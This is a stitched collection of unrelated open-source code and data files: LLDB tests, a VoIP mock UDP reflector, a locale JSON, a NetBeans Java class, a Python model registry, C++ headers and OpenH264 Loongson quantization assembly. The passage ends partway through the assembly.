# TestCGImportedTypes.py # # This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See https://swift.org/LICENSE.txt for license information # See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors # # ------------------------------------------------------------------------------ """ Test that we are able to deal with C-imported types (from CoreGraphics) """ import lldb from lldbsuite.test.lldbtest import * from lldbsuite.test.decorators import * import lldbsuite.test.lldbutil as lldbutil import os import unittest2 class TestSwiftCGImportedTypes(TestBase): mydir = TestBase.compute_mydir(__file__) def setUp(self): TestBase.setUp(self) @skipUnlessDarwin @swiftTest def test_swift_cg_imported_types(self): """Test that we are able to deal with C-imported types from CoreGraphics""" self.build() lldbutil.run_to_source_breakpoint( self, 'Set breakpoint here', lldb.SBFileSpec('main.swift')) rect = self.frame().FindVariable("cgrect") self.assertTrue(rect.IsValid(), "Got the cgrect variable") origin_var = rect.GetChildMemberWithName("origin") self.assertTrue(origin_var.IsValid(), "Got origin from cgrect") x_var = origin_var.GetChildMemberWithName("x") self.assertTrue(x_var.IsValid(), "Got valid x from cgrect.origin") x_native = x_var.GetChildMemberWithName("native") self.assertTrue( x_native.IsValid(), "Got valid native from cgrect.origin.x") self.assertEquals(x_native.GetValue(), "10", "Value of x is correct")
648
389
// // libtgvoip is free and unencumbered public domain software. // For more information, see http://unlicense.org or the UNLICENSE file // you should have received with this source code distribution. // #include "MockReflector.h" #include <arpa/inet.h> #include <assert.h> #include <stdio.h> using namespace tgvoip; using namespace tgvoip::test; struct UdpReflectorSelfInfo{ uint8_t peerTag[16]; uint64_t _id1=0xFFFFFFFFFFFFFFFFLL; uint32_t _id2=0xFFFFFFFF; uint32_t magic=0xc01572c7; int32_t date; uint64_t query_id; uint64_t my_ip_padding1; uint32_t my_ip_padding2; uint32_t my_ip; uint32_t my_port; } __attribute__((packed)); MockReflector::MockReflector(std::string bindAddress, uint16_t bindPort){ sfd=socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); assert(sfd!=-1); sockaddr_in bindAddr={0}; bindAddr.sin_family=AF_INET; bindAddr.sin_port=htons(bindPort); inet_aton(bindAddress.c_str(), &bindAddr.sin_addr); int res=bind(sfd, (struct sockaddr*)&bindAddr, sizeof(bindAddr)); assert(res==0); } MockReflector::~MockReflector(){ } std::array<std::array<uint8_t, 16>, 2> MockReflector::GeneratePeerTags(){ std::array<uint8_t, 16> tag1; for(int i=0;i<16;i++){ tag1[i]=(uint8_t)rand(); } tag1[15] &= 0xFE; std::array<std::array<uint8_t, 16>, 2> res; res[0]=tag1; std::copy(tag1.begin(), tag1.end(), res[1].begin()); res[1][15] |= 1; return res; } void MockReflector::Start(){ if(running) return; running=true; pthread_create(&thread, NULL, [](void* arg) -> void* { reinterpret_cast<MockReflector*>(arg)->RunThread(); return NULL; }, this); } void MockReflector::Stop(){ running=false; shutdown(sfd, SHUT_RDWR); close(sfd); pthread_join(thread, NULL); } void MockReflector::SetDropAllPackets(bool drop){ dropAllPackets=drop; } void MockReflector::RunThread(){ while(running){ std::array<uint8_t, 1500> buf; sockaddr_in addr; socklen_t addrlen=sizeof(addr); ssize_t len=recvfrom(sfd, buf.data(), sizeof(buf), 0, (struct sockaddr*)&addr, &addrlen); if(len<=0) return; if(len>=32){ std::array<uint8_t, 16> peerTag; int32_t specialID[4]; std::copy(buf.begin(), buf.begin()+16, peerTag.begin()); memcpy(specialID, buf.data()+16, 16); uint64_t tagID=*reinterpret_cast<uint64_t*>(peerTag.data()); ClientPair c=clients[tagID]; sockaddr_in* dest; if(peerTag[15] & 1){ c.addr1=addr; dest=&c.addr0; }else{ c.addr0=addr; dest=&c.addr1; } clients[tagID]=c; if(specialID[0]==-1 && specialID[1]==-1 && specialID[2]==-1){ if(specialID[3]==-1){ continue; }else if(specialID[3]==-2){ UdpReflectorSelfInfo response; memcpy(response.peerTag, peerTag.data(), 16); response.date=(int32_t)time(NULL); response.query_id=*reinterpret_cast<uint64_t*>(buf.data()+32); response.my_ip_padding1=0; response.my_ip_padding2=0xFFFF0000; response.my_ip=(uint32_t)addr.sin_addr.s_addr; response.my_port=ntohs(addr.sin_port); sendto(sfd, &response, sizeof(response), 0, (struct sockaddr*)&addr, sizeof(addr)); continue; } } if(dest->sin_family==AF_INET && !dropAllPackets){ if(peerTag[15] & 1) buf[15] &= 0xFE; else buf[15] |= 1; sendto(sfd, buf.data(), len, 0, (struct sockaddr*)dest, sizeof(sockaddr_in)); } } } }
1,539
457
<reponame>vico-aguado/intl {"NAME":"es_US","ERAS":["a. C.","d. C."],"ERANAMES":["antes de Cristo","después de Cristo"],"NARROWMONTHS":["E","F","M","A","M","J","J","A","S","O","N","D"],"STANDALONENARROWMONTHS":["E","F","M","A","M","J","J","A","S","O","N","D"],"MONTHS":["enero","febrero","marzo","abril","mayo","junio","julio","agosto","septiembre","octubre","noviembre","diciembre"],"STANDALONEMONTHS":["enero","febrero","marzo","abril","mayo","junio","julio","agosto","septiembre","octubre","noviembre","diciembre"],"SHORTMONTHS":["ene.","feb.","mar.","abr.","may.","jun.","jul.","ago.","sep.","oct.","nov.","dic."],"STANDALONESHORTMONTHS":["ene.","feb.","mar.","abr.","may.","jun.","jul.","ago.","sep.","oct.","nov.","dic."],"WEEKDAYS":["domingo","lunes","martes","miércoles","jueves","viernes","sábado"],"STANDALONEWEEKDAYS":["domingo","lunes","martes","miércoles","jueves","viernes","sábado"],"SHORTWEEKDAYS":["dom.","lun.","mar.","mié.","jue.","vie.","sáb."],"STANDALONESHORTWEEKDAYS":["dom.","lun.","mar.","mié.","jue.","vie.","sáb."],"NARROWWEEKDAYS":["D","L","M","M","J","V","S"],"STANDALONENARROWWEEKDAYS":["D","L","M","M","J","V","S"],"SHORTQUARTERS":["T1","T2","T3","T4"],"QUARTERS":["1.er trimestre","2.º trimestre","3.er trimestre","4.º trimestre"],"AMPMS":["a. m.","p. m."],"DATEFORMATS":["EEEE, d 'de' MMMM 'de' y","d 'de' MMMM 'de' y","d MMM y","d/M/y"],"TIMEFORMATS":["h:mm:ss a zzzz","h:mm:ss a z","h:mm:ss a","h:mm a"],"AVAILABLEFORMATS":null,"FIRSTDAYOFWEEK":6,"WEEKENDRANGE":[5,6],"FIRSTWEEKCUTOFFDAY":5,"DATETIMEFORMATS":["{1}, {0}","{1}, {0}","{1} {0}","{1} {0}"]}
685
335
{ "word": "Lost", "definitions": [ "Unable to find one's way; not knowing one's whereabouts.", "Unable to be found.", "Unable to understand or to cope with a situation.", "That has been taken away or cannot be recovered.", "(of time or an opportunity) not used advantageously; wasted.", "Having died or been destroyed.", "(of a game or contest) in which a defeat has been sustained." ], "parts-of-speech": "Adjective" }
180
1,056
<filename>enterprise/web.core/src/org/netbeans/modules/web/core/jsploader/JspServletDataObject.java<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.web.core.jsploader; import java.beans.PropertyChangeEvent; import java.beans.PropertyChangeListener; import java.beans.PropertyChangeSupport; import java.io.IOException; import org.openide.nodes.Node; import org.openide.util.Lookup; import org.openide.util.Task; import org.openide.text.Line; import org.openide.util.NbBundle; import org.netbeans.api.java.loaders.JavaDataSupport; import org.openide.cookies.EditorCookie; import org.openide.filesystems.FileObject; import org.openide.loaders.DataObject; import org.openide.loaders.DataObjectExistsException; import org.openide.loaders.DataObjectNotFoundException; import org.openide.loaders.MultiDataObject; import org.openide.loaders.MultiFileLoader; /** Dataobject representing a servlet generated from a JSP page * * @author <NAME> */ public final class JspServletDataObject extends MultiDataObject { public static final String EA_ORIGIN_JSP_PAGE = "NetBeansAttrOriginJspPage"; // NOI18N public JspServletDataObject(FileObject pf, MultiFileLoader loader) throws DataObjectExistsException { super(pf, loader); } @Override public Node createNodeDelegate() { return JavaDataSupport.createJavaNode(getPrimaryFile()); } @Override public Lookup getLookup() { return getCookieSet().getLookup(); } /** Get the name of the data object. * Uses the name of the source JSP * @return the name */ @Override public String getName () { DataObject jsp = getSourceJspPage(); if (jsp == null) return super.getName(); int markIndex = getPrimaryFile().getName().lastIndexOf(JspServletDataLoader.JSP_MARK); String fileIndex = (markIndex == -1) ? "" : getPrimaryFile().getName().substring( markIndex + JspServletDataLoader.JSP_MARK.length()); if (fileIndex.startsWith("_")) // NOI18N fileIndex = fileIndex.substring(1); if ("".equals(fileIndex)) { return NbBundle.getMessage(JspServletDataObject.class, "LBL_ServletDisplayNameNoNumber", jsp.getPrimaryFile().getName()); } else { return NbBundle.getMessage(JspServletDataObject.class, "LBL_ServletDisplayName", new Object[] {fileIndex, jsp.getPrimaryFile().getName()}); } } /** Sets the source JSP page for this servlet */ public void setSourceJspPage(DataObject jspPage) throws IOException { setSourceJspPage(getPrimaryFile(), jspPage); firePropertyChange(PROP_COOKIE, null, null); } public static void setSourceJspPage(FileObject generatedServlet, DataObject jspPage) throws IOException { generatedServlet.setAttribute(EA_ORIGIN_JSP_PAGE, jspPage.getPrimaryFile()); } /** Returns the source JSP page for this servlet */ public DataObject getSourceJspPage() { Object obj = getPrimaryFile().getAttribute(EA_ORIGIN_JSP_PAGE); if (obj instanceof DataObject) return (DataObject)obj; if (obj instanceof FileObject) { if (((FileObject)obj).isValid()) { try { return DataObject.find((FileObject)obj); } catch (DataObjectNotFoundException e) { //nothing to do } } } return null; } private static class ServletEditorCookie implements EditorCookie.Observable, PropertyChangeListener { private EditorCookie original; private JspServletDataObject servlet; private EditorCookie currentEditor; private PropertyChangeSupport pcs; public ServletEditorCookie(EditorCookie original, JspServletDataObject servlet) { this.original = original; this.servlet = servlet; pcs = new PropertyChangeSupport(this); } private EditorCookie currentEditorCookie() { EditorCookie newCurrent = computeCurrentEditorCookie(); if (currentEditor != newCurrent) { // re-register a property change listener to the new editor if ((currentEditor != null) && (currentEditor instanceof EditorCookie.Observable)) { ((EditorCookie.Observable)currentEditor).removePropertyChangeListener(this); } if ((newCurrent != null) && (newCurrent instanceof EditorCookie.Observable)) { ((EditorCookie.Observable)newCurrent).addPropertyChangeListener(this); } // remember the new editor currentEditor = newCurrent; } return currentEditor; } private EditorCookie computeCurrentEditorCookie() { DataObject jsp = servlet.getSourceJspPage(); if ((jsp != null) && (jsp instanceof JspDataObject)) { if (((JspDataObject)jsp).getServletDataObject() == servlet) { EditorCookie newCookie = ((JspDataObject) jsp).getServletEditor(); if (newCookie != null) return newCookie; } } return original; } // implementation of EditorCookie public Line.Set getLineSet() { return currentEditorCookie().getLineSet(); } public void open() { currentEditorCookie().open(); } public boolean close() { return currentEditorCookie().close(); } public Task prepareDocument() { return currentEditorCookie().prepareDocument(); } public javax.swing.text.StyledDocument openDocument() throws java.io.IOException { return currentEditorCookie().openDocument(); } public javax.swing.text.StyledDocument getDocument() { return currentEditorCookie().getDocument(); } public void saveDocument() throws java.io.IOException { currentEditorCookie().saveDocument(); } public boolean isModified() { return currentEditorCookie().isModified(); } public javax.swing.JEditorPane[] getOpenedPanes() { return currentEditorCookie().getOpenedPanes(); } // implementation of EditorSupport.Observable public void addPropertyChangeListener(PropertyChangeListener l) { pcs.addPropertyChangeListener(l); } public void removePropertyChangeListener(PropertyChangeListener l) { pcs.removePropertyChangeListener(l); } // implementation of PropertyChangeListener public void propertyChange(PropertyChangeEvent evt) { pcs.firePropertyChange(evt); } } }
3,104
1,893
""" Registry module """ from transformers import AutoModel, AutoModelForQuestionAnswering, AutoModelForSequenceClassification from transformers.models.auto.tokenization_auto import TOKENIZER_MAPPING class Registry: """ Methods to register models and fully support pipelines. """ @staticmethod def register(model, config=None): """ Registers a model with auto model and tokenizer configuration to fully support pipelines. Args: model: model to register config: config class name """ # Default config class name to model name if not provided name = model.__class__.__name__ if not config: config = name # Default model config_class if empty if hasattr(model.__class__, "config_class") and not model.__class__.config_class: model.__class__.config_class = config # Add references for this class to supported AutoModel classes for mapping in [AutoModel, AutoModelForQuestionAnswering, AutoModelForSequenceClassification]: mapping.register(config, model.__class__) # Add references for this class to support pipeline AutoTokenizers if hasattr(model, "config") and type(model.config) not in TOKENIZER_MAPPING: TOKENIZER_MAPPING.register(type(model.config), type(model.config).__name__)
496
852
<reponame>Purva-Chaudhari/cmssw #ifndef EventFilter_GEMRawToDigi_GEMRawToDigi_h #define EventFilter_GEMRawToDigi_GEMRawToDigi_h /** \class GEMRawToDigi * \author <NAME>, <NAME> - UoS */ #include <memory> #include "DataFormats/GEMDigi/interface/GEMAMC13.h" class GEMRawToDigi { public: std::unique_ptr<GEMAMC13> convertWordToGEMAMC13(const uint64_t* word); bool vfatError() const { return vfatError_; } bool amcError() const { return amcError_; } private: bool vfatError_; bool amcError_; }; #endif
216
346
/*! -*-c++-*- @file SensorImpl.h @author <NAME> @brief Private implementation of a simple sensor/camera abstraction. \copyright Copyright 2017 Elucideye, Inc. All rights reserved. \license{This project is released under the 3 Clause BSD License.} */ #ifndef __drishti_drishti_SensorImpl_h__ #define __drishti_drishti_SensorImpl_h__ #include <drishti/Sensor.hpp> #include <drishti/sensor/Sensor.h> _DRISHTI_SDK_BEGIN struct SensorModel::Impl { Impl(const sensor::SensorModel::Intrinsic& intrinsic, const sensor::SensorModel::Extrinsic& extrinsic) { sensor = std::make_shared<sensor::SensorModel>(intrinsic, extrinsic); } // Use shared_ptr<> to support sharing w/ public SDK classes std::shared_ptr<drishti::sensor::SensorModel> sensor; }; _DRISHTI_SDK_END #endif // __drishti_drishti_SensorImpl_h__
319
515
<gh_stars>100-1000 package br.com.caelum.stella.faces.validation; import javax.faces.validator.Validator; import javax.faces.webapp.ValidatorELTag; import javax.servlet.jsp.JspException; /** * Associa um TLD (Descritor de Biblioteca de Tag) a um validador de Titulo Eleitoral * (StellaTituloEleitoralValidator). * * @author <NAME> */ @SuppressWarnings("serial") public class StellaTituloEleitoralValidatorTag extends ValidatorELTag { public StellaTituloEleitoralValidatorTag() { super.setId(StellaTituloEleitoralValidator.VALIDATOR_ID); } /** * @return StellaTituloEleitoralValidator */ @Override protected Validator createValidator() throws JspException { StellaTituloEleitoralValidator validator = new StellaTituloEleitoralValidator(); return validator; } }
315
363
<reponame>LarsP8/service-proxy /* Copyright 2013 predic8 GmbH, www.predic8.com Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.predic8.contactservice.v20; import javax.jws.WebService; import javax.jws.WebMethod; import javax.jws.WebParam; @WebService(serviceName = "ContactService20", targetNamespace="http://predic8.com/contactService/v20") public class ContactService20 { @WebMethod(operationName = "addContact") public String addContact( @WebParam(name = "firstname") String firstname, @WebParam(name = "lastname") String lastname, @WebParam(name = "email") String email) { return "Hello " + firstname + " " + lastname + " " + email + " from ContactService version 2.0 !"; } }
415
434
#pragma once #include "Base/Base.h" #include "Data/ProjectData.h" #include "Modules/ModuleManager.h" #include "Sea/SeaManager.h" #include "Lighting/LightManager.h" #include "Data/Serializer.h" #include "Menu/MainMenu.h" #include "Generators/MeshGeneratorManager.h" #include "TextureStore/TextureStore.h" #include "Misc/SupportersTribute.h" #include "Filters/FiltersManager.h" #include "Foliage/FoliagePlacement.h" #include "Sky/SkySettings.h" #include "Misc/OSLiscences.h" #include "Shading/ShadingManager.h" #include "Exporters/TextureBaker.h" #include "json/json.hpp" struct ApplicationStateModels { Model *coreTerrain; Model *grid; // For future use Model *screenQuad; Model *customBase; Model *customBaseCopy; ApplicationStateModels(); ~ApplicationStateModels(); }; struct ApplicationStateFrameBuffers { FrameBuffer *reflection = nullptr; FrameBuffer *postProcess = nullptr; FrameBuffer *main = nullptr; }; struct ApplicationStateShaders { Shader *terrain = nullptr; Shader *wireframe = nullptr; Shader *foliage = nullptr; Shader *postProcess = nullptr; // For future use Shader *meshNormals = nullptr; }; struct ApplicationStateCameras { Camera main; Camera postPorcess; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateStatistics { double deltatime = 1; double frameRate = 1; double meshGenerationTime = 0; int triangles = 0; int vertexCount = 0; }; struct ApplicationStateWindows { bool styleEditor = false; bool statsWindow = false; bool shaderEditorWindow = false; bool texturEditorWindow = false; bool seaEditor = false; bool textureStore = false; bool osLisc = false; bool filtersManager = false; bool foliageManager = false; bool supportersTribute = false; bool skySettings = false; bool modulesManager = false; bool lightControls = true; bool cameraControls = true; bool shadingManager = false; bool textureBaker = false; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateModules { ModuleManager *manager; }; struct ApplicationStateStates { bool usingBase = true; bool skyboxEnabled = false; bool vSync = true; bool autoUpdate = false; bool mouseButton1, mouseButton2, mouseButton3; bool wireFrameMode = false; bool reqTexRfrsh = false; bool autoSave = false; bool exploreMode = false; bool iExploreMode = false; bool showFoliage = true; bool textureBake = false; bool useGPUForNormals = false; bool postProcess = false; bool autoAspectCalcRatio = true; std::atomic<bool> ruinning = true; std::atomic<bool> remeshing = false; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateTextures { Texture2D *grid; }; struct ApplicationStateGlobals { float mouseSpeed = 25; float scrollSpeed = 0.5f; float mouseScrollAmount = 0; float viewportMousePosX = 0; float viewportMousePosY = 0; float scale = 1.0f; float offset[3]; int resolution = 256; int numberOfNoiseTypes = 3; int secondCounter = 0; int textureBakeMode = 0; int texBakeRes = 1024; nlohmann::json appData; std::string currentOpenFilePath = ""; std::string currentBaseModelPath = ""; std::string kernelsIncludeDir = ""; float viewportSize[4]; float hMapC[4]; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateConstants { glm::vec3 UP = glm::vec3(0.0f, 1.0f, 0.0f); glm::vec3 DOWN = glm::vec3(0.0f, -1.0f, 0.0f); glm::vec3 FRONT = glm::vec3(0.0f, 0.0f, -1.0f); glm::vec3 BACK = glm::vec3(0.0f, 1.0f, 1.0f); std::string executableDir = ""; std::string dataDir = ""; std::string cacheDir = ""; std::string texturesDir = ""; std::string projectsDir = ""; std::string tempDir = ""; std::string shadersDir = ""; std::string kernelsDir = ""; std::string fontsDir = ""; std::string liscensesDir = ""; std::string skyboxDir = ""; std::string modulesDir = ""; std::string modelsDir = ""; std::string configsDir = ""; std::string logsDir = ""; }; enum ApplicationMode { TERRAIN = 0, CUSTOM_BASE, CUBE_MARCHED }; struct ApplicationState { Application *mainApp; ApplicationStateModels models; ApplicationStateFrameBuffers frameBuffers; ApplicationStateShaders shaders; ApplicationStateCameras cameras; ApplicationStateStatistics stats; ApplicationStateWindows windows; ApplicationStateModules modules; ApplicationStateStates states; ApplicationStateTextures textures; ApplicationStateGlobals globals; ApplicationStateConstants constants; SeaManager *seaManager = nullptr; LightManager *lightManager = nullptr; Serializer *serailizer = nullptr; MeshGeneratorManager *meshGenerator = nullptr; MainMenu *mainMenu = nullptr; TextureStore *textureStore = nullptr; SupportersTribute *supportersTribute = nullptr; FiltersManager *filtersManager = nullptr; SkyManager *skyManager = nullptr; OSLiscences *osLiscences = nullptr; ProjectManager *projectManager = nullptr; FoliageManager *foliageManager = nullptr; ShadingManager *shadingManager = nullptr; TextureBaker* textureBaker = nullptr; ApplicationMode mode = ApplicationMode::TERRAIN; ApplicationState(); ~ApplicationState(); };
1,762
3,565
<gh_stars>1000+ /*! * \copy * Copyright (c) 2009-2018, Cisco Systems * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * * * \file quant_mmi.c * * \brief Loongson optimization * * \date 20/07/2018 Created * ************************************************************************************* */ #include <stdint.h> #include "asmdefs_mmi.h" void WelsQuant4x4_mmi(int16_t *pDct, const int16_t* ff, const int16_t *mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "xor $f10, $f10, $f10 \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14" ); } void WelsQuant4x4Dc_mmi(int16_t *pDct, const int16_t ff, int16_t mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "xor $f10, $f10, $f10 \n\t" "dmtc1 %[mf], $f12 \n\t" "pshufh $f12, $f12, $f10 \n\t" "dmtc1 %[ff], $f8 \n\t" "pshufh $f8, $f8, $f10 \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f8 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f12 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f8 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f12 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short)ff), [mf]"r"((short)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12" ); } void WelsQuantFour4x4_mmi(int16_t *pDct, const int16_t* ff, const int16_t *mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor 